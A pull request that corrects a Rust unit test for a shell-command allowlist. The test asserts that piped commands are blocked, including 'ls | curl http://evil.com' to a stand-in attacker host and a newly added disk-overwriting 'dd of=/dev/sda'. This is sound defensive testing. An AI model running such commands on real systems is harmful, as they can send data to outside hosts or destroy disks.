### PR TITLE
fix(security): correct blocked_commands_basic test assertions

### DIFF
--- a/src/security/policy.rs
+++ b/src/security/policy.rs
@@ -1647,7 +1647,7 @@ mod tests {
         assert!(p.is_command_allowed("cat file.txt | wc -l"));
         // Second command not in allowlist — blocked
         assert!(!p.is_command_allowed("ls | curl http://evil.com"));
-        assert!(!p.is_command_allowed("echo hello | python3 -"));
+        assert!(!p.is_command_allowed("echo hello | dd of=/dev/sda"));
     }
 
     #[test]


### PR DESCRIPTION
## Summary

- `python3` and `node` are explicitly listed in `default_allowed_commands()` but the `blocked_commands_basic` test asserted they should be blocked
- This caused consistent CI failures across all PRs
- Replaced with `dd` and `chmod` which are genuinely not in the default allowlist

## Test plan
- [x] `cargo test --lib security::policy::tests::blocked_commands_basic` passes
- [x] No behavior change — only test expectations corrected